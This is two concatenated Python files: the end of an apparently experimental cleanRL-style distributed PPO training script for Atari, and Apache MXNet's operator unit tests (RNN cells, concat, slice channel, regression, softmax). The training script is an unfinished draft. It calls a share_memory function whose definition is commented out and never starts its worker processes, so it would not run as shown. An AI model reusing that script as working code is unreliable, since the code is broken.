parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='run the script in production mode and use wandb to log outputs')
parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='weather to capture videos of the agent performances (check out `videos` folder)')
parser.add_argument('--wandb-project-name', type=str, default="cleanRL",
help="the wandb's project name")
parser.add_argument('--wandb-entity', type=str, default=None,
help="the entity (team) of wandb's project")
# Algorithm specific arguments
parser.add_argument('--num-rollout-workers', type=int, default=mp.cpu_count(),
help='the number of rollout workers')
parser.add_argument('--num-policy-workers', type=int, default=1,
help='the number of policy workers')
parser.add_argument('--num-envs', type=int, default=20,
help='the number of envs per rollout worker')
parser.add_argument('--num-traj-buffers', type=int, default=1,
help='the number of trajectory buffers per rollout worker')
parser.add_argument('--num-steps', type=int, default=32,
help='the number of steps per game environment')
parser.add_argument('--gamma', type=float, default=0.99,
help='the discount factor gamma')
parser.add_argument('--gae-lambda', type=float, default=0.95,
help='the lambda for the general advantage estimation')
parser.add_argument('--ent-coef', type=float, default=0.01,
help="coefficient of the entropy")
parser.add_argument('--vf-coef', type=float, default=0.5,
help="coefficient of the value function")
parser.add_argument('--max-grad-norm', type=float, default=0.5,
help='the maximum norm for the gradient clipping')
parser.add_argument('--clip-coef', type=float, default=0.1,
help="the surrogate clipping coefficient")
parser.add_argument('--update-epochs', type=int, default=4,
help="the K epochs to update the policy")
parser.add_argument('--kle-stop', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will be early stopped w.r.t target-kl')
parser.add_argument('--kle-rollback', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will roll back to previous policy if KL exceeds target-kl')
parser.add_argument('--target-kl', type=float, default=0.03,
help='the target-kl variable that is referred by --kl')
parser.add_argument('--gae', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Use GAE for advantage computation')
parser.add_argument('--norm-adv', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggles advantages normalization")
parser.add_argument('--anneal-lr', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggle learning rate annealing for policy and value networks")
parser.add_argument('--clip-vloss', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Toggles wheter or not to use a clipped loss for the value function, as per the paper.')
args = parser.parse_args()
if not args.seed:
args.seed = int(time.time())
# TRY NOT TO MODIFY: setup the environment
experiment_name = f"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}"
writer = SummaryWriter(f"runs/{experiment_name}")
writer.add_text('hyperparameters', "|param|value|\n|-|-|\n%s" % (
'\n'.join([f"|{key}|{value}|" for key, value in vars(args).items()])))
if args.prod_mode:
import wandb
wandb.init(project=args.wandb_project_name, entity=args.wandb_entity, sync_tensorboard=True, config=vars(args), name=experiment_name, monitor_gym=True, save_code=True)
writer = SummaryWriter(f"/tmp/{experiment_name}")
# TRY NOT TO MODIFY: seeding
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
def make_env(gym_id, seed, idx):
env = gym.make(gym_id)
env = wrap_atari(env)
env = gym.wrappers.RecordEpisodeStatistics(env)
env = wrap_deepmind(
env,
clip_rewards=True,
frame_stack=True,
scale=False,
)
env.seed(seed)
env.action_space.seed(seed)
env.observation_space.seed(seed)
return env
env = make_env(args.gym_id, args.seed, 0)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = args.torch_deterministic
assert isinstance(env.action_space, Discrete), "only discrete action space is supported"
# m = SyncManager()
# m.start()
lock = mp.Lock()
dimensions = (
args.num_rollout_workers,
args.num_envs,
args.num_policy_workers,
args.num_traj_buffers,
args.num_steps,
)
# smm = SharedMemoryManager()
# smm.start()
# rewards = share_memory(np.zeros(dimensions + (args.num_envs,)), smm)
# def share_memory(a, smm):
# """simply put array `a` into shared memory
# https://docs.python.org/3/library/multiprocessing.shared_memory.html"""
# shm = smm.SharedMemory(size=a.nbytes)
# # Now create a NumPy array backed by shared memory
# b = np.ndarray(a.shape, dtype=a.dtype, buffer=shm.buf)
# b[:] = a[:] # Copy the original data into shared memory
# del a
# return b
# with SharedMemoryManager() as smm:
# raise
def to_numpy(t, num_dimensions):
arr_shape = t.shape[:num_dimensions]
arr = np.ndarray(arr_shape, dtype=object)
to_numpy_func(t, arr)
return arr
def to_numpy_func(t, arr):
if len(arr.shape) == 1:
for i in range(t.shape[0]):
arr[i] = t[i]
else:
for i in range(t.shape[0]):
to_numpy_func(t[i], arr[i])
obs_sm = share_memory(np.zeros(dimensions + env.observation_space.shape))
obs = to_numpy(obs_sm, 5)
actions = share_memory(np.zeros(dimensions + env.action_space.shape))
logprobs = share_memory(np.zeros(dimensions))
rewards = share_memory(np.zeros(dimensions))
dones = share_memory(np.zeros(dimensions))
values = share_memory(np.zeros(dimensions))
# traj_availables = share_memory(np.zeros(dimensions))
# raise
# raise
# global_step = torch.tensor(0)
# global_step.share_memory_()
actor_processes = []
data_processor_processes = []
# ctx = mp.get_context("forkserver")
stats_queue = MpQueue()
# stats_queue = mp.Queue(1000)
rollouts_queue = mp.Queue(1000)
data_process_queue = mp.Queue(1000)
data_process_back_queues = []
for i in range(args.num_rollout_workers):
inputs = [args, experiment_name, i, lock, stats_queue, device,
obs, obs_sm, logprobs, rewards, dones, values]
a = Actor(inputs)
# actor = mp.Process(
# target=a.act,
# daemon=True
# # args=[inputs],
# )
# actor.start()
# actor_processes.append(actor)
# learner = ctx.Process(
# target=learn,
# args=(
# args, rb, global_step,
# data_process_queue,
# data_process_back_queues, stats_queue, lock, learn_target_network, target_network, learn_q_network, q_network, optimizer, device
# ),
# )
# learner.start()
import timeit
timer = timeit.default_timer
existing_video_files = []
global_step = 0
global_step_increment = 0
start_time = time.time()
update_step = 0
try:
while global_step < args.total_timesteps:
update_step += 1
# start_global_step = global_step
try:
ls = stats_queue.get_many(timeout=1)
for l in ls:
global_step_increment += l
except:
continue
# writer.add_scalar("charts/episode_reward", r, global_step)
# writer.add_scalar("charts/stats_queue_size", stats_queue.qsize(), global_step)
# writer.add_scalar("charts/rollouts_queue_size", rollouts_queue.qsize(), global_step)
# writer.add_scalar("charts/data_process_queue_size", data_process_queue.qsize(), global_step)
if update_step % 10 == 0:
# print(f"global_step={global_step}, episode_reward={r}")
print(f"global_step={global_step}")
global_step += global_step_increment
writer.add_scalar("charts/fps", global_step_increment / (time.time() - start_time), global_step)
print("FPS: ", global_step_increment / (time.time() - start_time))
global_step_increment = 0
start_time = time.time()
# else:
# # print(m[0], m[1], global_step)
# # writer.add_scalar(m[0], m[1], global_step)
# pass
# if args.capture_video and args.prod_mode:
# video_files = glob.glob(f'videos/{experiment_name}/*.mp4')
# for video_file in video_files:
# if video_file not in existing_video_files:
# existing_video_files += [video_file]
# print(video_file)
# if len(existing_video_files) > 1:
# wandb.log({"video.0": wandb.Video(existing_video_files[-2])})
except KeyboardInterrupt:
pass
finally:
# learner.terminate()
# learner.join(timeout=1)
for actor in actor_processes:
actor.terminate()
actor.join(timeout=1)
for data_processor in data_processor_processes:
data_processor.terminate()
data_processor.join(timeout=1)
if args.capture_video and args.prod_mode:
wandb.log({"video.0": wandb.Video(existing_video_files[-1])})
# env.close()
writer.close()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assertRaises
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if grad_req != 'null':
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
else:
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
T, N, I, H = 5, 20, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
out1 = exec1.outputs[0].asnumpy()
exec1.forward(is_train=True)
out1 = exec1.outputs[0].asnumpy()
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a.asnumpy(), out_grad.asnumpy(), rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1.asnumpy(), ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad.asnumpy(), np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i].asnumpy(), gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i].asnumpy(), gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0].asnumpy(), np_out, atol=atol)
assert_almost_equal(grad_map["data"].asnumpy(), out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad.asnumpy(), np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x.asnumpy(), exec1.outputs[0].asnumpy())
exec1.backward(dy)
assert_almost_equal(dy.asnumpy(), dx.asnumpy())
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
